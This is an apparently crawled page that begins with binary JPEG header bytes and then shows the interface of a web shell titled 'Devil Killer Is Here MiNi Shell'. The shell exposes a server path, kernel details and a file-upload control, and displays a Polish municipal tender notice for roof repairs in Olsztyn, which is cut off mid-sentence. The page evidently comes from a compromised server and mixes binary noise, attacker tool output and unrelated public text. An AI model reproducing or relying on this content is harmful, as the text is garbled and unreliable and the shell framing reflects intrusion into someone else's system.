JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210830/0016345801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty dachów budynków mieszkalnych wielorodzinnych przy <br/>ul. Partyzantów 21, Towarowej 18 G, Towarowej 18 H. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD LOKALI I BUDYNKÓW KOMUNALNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 519583959</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cicha 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-313</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zlibk@zlibk.olsztyn.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zlibk.olsztyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty dachów budynków mieszkalnych wielorodzinnych przy <br/>ul. Partyzantów 21, Towarowej 18 G, Towarowej 18 H. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f98bb10c-095e-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00163458</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008165/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Remonty dachów i kominów </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminaolsztyn.logintrade.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminaolsztyn.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu zostały opisane w Instrukcjach korzystania z Platformy przetargowej Gminy Olsztyn<br/>dostępnych pod adresem: https://gminaolsztyn.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z treścią art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), (Dz. Urz. UEL<br/>119 z 04.05.2016, str. 1, ze zm.), zwanego dalej RODO, Prokuratura Krajowa informuje, że:<br/>1. Administratorem, w rozumieniu art. 4 pkt 7 RODO, danych osobowych jest Zakład Lokali i Budynków<br/>Komunalnych w Olsztynie ul. Cicha 5, 10-313 Olsztyn tel: 89 533-36-26 e mail: zlibk@zlibk.olsztyn.eu<br/>2. Inspektorem ochrony danych w Zakładzie Lokali i Budynków Komunalnych w Olsztynie jest Zdzisław<br/>Ciołkowski e mail: ciolkowski.zdzislaw@zlibk.olsztyn.eu<br/>3. Dane osobowe przetwarzane są w celu przeprowadzenia niniejszego postępowania o udzielenie<br/>zamówienia publicznego. 4. Podstawę prawną przetwarzania danych stanowią przepisy art. 6 ust. 1 lit. c RODO w związku z<br/>przepisami ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. 2019 poz. 2019<br/>ze zm.), zwanej dalej ustawą Pzp.<br/>5. Dane osobowe mogą być udostępniane podmiotom uprawnionym do ich otrzymywania na podstawie<br/>przepisów prawa lub umowy, w szczególności osobom lub podmiotom, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>6. Dane osobowe są przechowywane przez okres niezbędny do przeprowadzenia postępowania o<br/>udzielenie zamówienia publicznego oraz do czasu przedawnienia ewentualnych roszczeń. Ponadto,<br/>dane osobowe będą przechowywane przez okres archiwizacji dokumentów wynikający z przepisów<br/>prawa.<br/>7. Osobie, której dane są przetwarzane przysługuje prawo:<br/>1) dostępu do treści swoich danych osobowych, na zasadach określonych w art. 15 RODO. W<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 – 3 RODO wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia – art. 75 Pzp;<br/>2) żądania sprostowania swoich danych osobowych na zasadach określonych w art. 16 RODO.<br/>Skorzystanie z prawa do sprostowania nie może:<br/>a) skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp – art. 19 ust. 2 ustawy Pzp,<br/>b) naruszać integralności protokołu oraz jego załączników – art. 76 ustawy Pzp;<br/>3) ograniczenia przetwarzania danych, z zastrzeżeniem przypadków określonych w art. 18 ust. 2<br/>RODO, z tym że wystąpienie z takim żądaniem nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania – art. 19 ust. 3 ustawy Pzp;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, adres: ul. Stawki 2, 00 – 193<br/>Warszawa, w przypadku uznania, że przetwarzanie danych osobowych jej dotyczących narusza<br/>przepisy RODO.<br/>8. Osobie, której dane są przetwarzane nie przysługuje prawo:<br/>1) usunięcia danych osobowych – art. 17 ust. 3 lit. b, d lub e RODO;<br/>2) przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) wniesienia sprzeciwu wobec przetwarzania danych osobowych, o którym mowa w art. 21 RODO,<br/>gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9. W celu skorzystania z praw, o których mowa w pkt 7 ppkt 1 – 3 należy skontaktować się z<br/>administratorem lub inspektorem ochrony danych, korzystając ze wskazanych wyżej danych<br/>kontaktowych.<br/>10. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>11. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">: 1. Ochrona danych osobowych w zakresie przetwarzania<br/>danych przez Administratora Systemu i Operatora Platformy zakupowej:<br/>1) w zakresie dotyczącym zarządzania Platformą zakupową, wobec danych Wykonawców<br/>zarejestrowanych na Platformie zakupowej administratorem jest: Logintrade S.A. z siedzibą we<br/>Wrocławiu (Administrator Systemu), adres e-mail: kontakt@logintrade.pl, który powierzył przetwarzanie<br/>danych firmie: LT Serwis sp. z o.o. z siedzibą w Warszawie (Operator Platformy zakupowej),<br/>2) w sprawach związanych z ochroną danych w zakresie przetwarzania ich przez Logintrade S.A. oraz<br/>LT Serwis sp. z o.o. należy kontaktować się z Inspektorem Ochrony Danych, adres e-mail:<br/>ochronadanych@logintrade.com.pl<br/>3) dane użytkowników są przetwarzane przez Logintrade S.A. oraz LT Serwis sp. z o.o. na podstawie<br/>zgody wyrażonej przez nich przy okazji rejestracji wyłącznie w celu zapewnienia funkcjonalności<br/>Platformy zakupowej Zamawiającego.<br/>4) Administrator nie przewiduje udostępniania przetwarzanych danych podmiotom zewnętrznym, z<br/>wyjątkiem sytuacji przewidzianych przepisami prawa.<br/>5) dane osobowe przetwarzane są przez okres niezbędny do wykonania usługi, chyba że co innego<br/>wynika z przepisów prawa.<br/>6) dane osobowe podawane są przez użytkownika dobrowolnie, jednak ich podanie jest niezbędnym<br/>warunkiem do korzystania z Platformy zakupowej.<br/>7) wobec danych przetwarzanych przez Logintrade S.A. użytkownikowi przysługują następujące prawa:<br/>- użytkownik ma prawo dostępu do treści swoich danych osobowych oraz ich sprostowania, usunięcia<br/>lub ograniczenia przetwarzania i poprawiania,<br/>- użytkownik ma prawo do wniesienia sprzeciwu wobec przetwarzania, a także do przenoszenia<br/>danych,<br/>- użytkownik ma prawo do cofnięcia zgody na przetwarzanie danych w dowolnym momencie;<br/>skorzystanie z prawa cofnięcia zgody nie ma wpływu na przetwarzanie, które miało miejsce na<br/>podstawie zgody przed jej cofnięciem,<br/>- użytkownik ma prawo zgłoszenia skargi do organu nadzorczego.<br/>8) Logintrade S.A. z siedzibą we Wrocławiu sprawuje funkcję Administratora Systemu Platformy<br/>zakupowej i realizuje zadania związane z zapewnieniem prawidłowego funkcjonowania Platformy<br/>zakupowej.<br/>9) LT Serwis z siedzibą w Warszawie sprawuje funkcję Operatora Platformy i realizuje zadania<br/>związane z przetwarzaniem danych osobowych w ramach funkcjonowania Platformy zakupowej.<br/>2. Szczegółowe klauzule informacyjne o ochronie danych osobowych, dla których Administratorem jest<br/>Logintrade S.A. z siedzibą we Wrocławiu (Administrator Systemu), który powierzył przetwarzanie<br/>danych firmie: LT Serwis sp. z o.o. z siedzibą w Warszawie (Operator Platformy zakupowej) zawarte są<br/>na stronie internetowej pod adresem: https://gminaolsztyn.logintrade.net/rejestracja/regulamin.html<br/>3. Analogiczny obowiązek informacyjny, jak w przypadku pozyskiwania danych osobowych powstanie,<br/>gdy Zamawiający uzyska od Wykonawcy dane osobowe dotyczące innych osób (np. osób, których<br/>dane służą do wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, osób<br/>skierowanych do realizacji zamówienia, osób fizycznych prowadzących działalność gospodarczą, które<br/>zostaną wskazane jako podwykonawca). Obowiązek ten jest uregulowany w art. 14 RODO. W związku<br/>z powyższym Zamawiający przypomina, że obowiązek informacyjny określony przepisami RODO<br/>spoczywa także na Wykonawcach, którzy pozyskują dane osobowe osób trzecich w celu przekazania<br/>ich Zamawiającym w ofertach.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZLiBK/ZP-6/08/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 292264,31 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie remontu dachu budynku mieszkalnego wielorodzinnego przy <br/>ul. Partyzantów 21 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 214670,21 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45261410-1 - Izolowanie dachu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie remontu dachu budynku mieszkalnego wielorodzinnego przy <br/>ul. Towarowej 18G </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45261410-1 - Izolowanie dachu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie remontu dachu budynku mieszkalnego wielorodzinnego przy <br/>ul. Towarowej 18H </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 38797,05 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45261410-1 - Izolowanie dachu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1.1 Posiadania wiedzy i doświadczenia<br/>Dotyczy zadania 1<br/>W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia Wykonawcy zobowiązują się udokumentować zrealizowanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 roboty odpowiadające swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia (roboty dachowe) oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie / minimum 2 referencje lub opinie o wartości łącznej co najmniej <br/>150 000,00 zł netto.<br/><br/>Dotyczy zadania 2<br/>W celu potwierdzenia posiadania niezbędnej wiedzy i doświadczenia Wykonawcy zobowiązują się udokumentować zrealizowanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 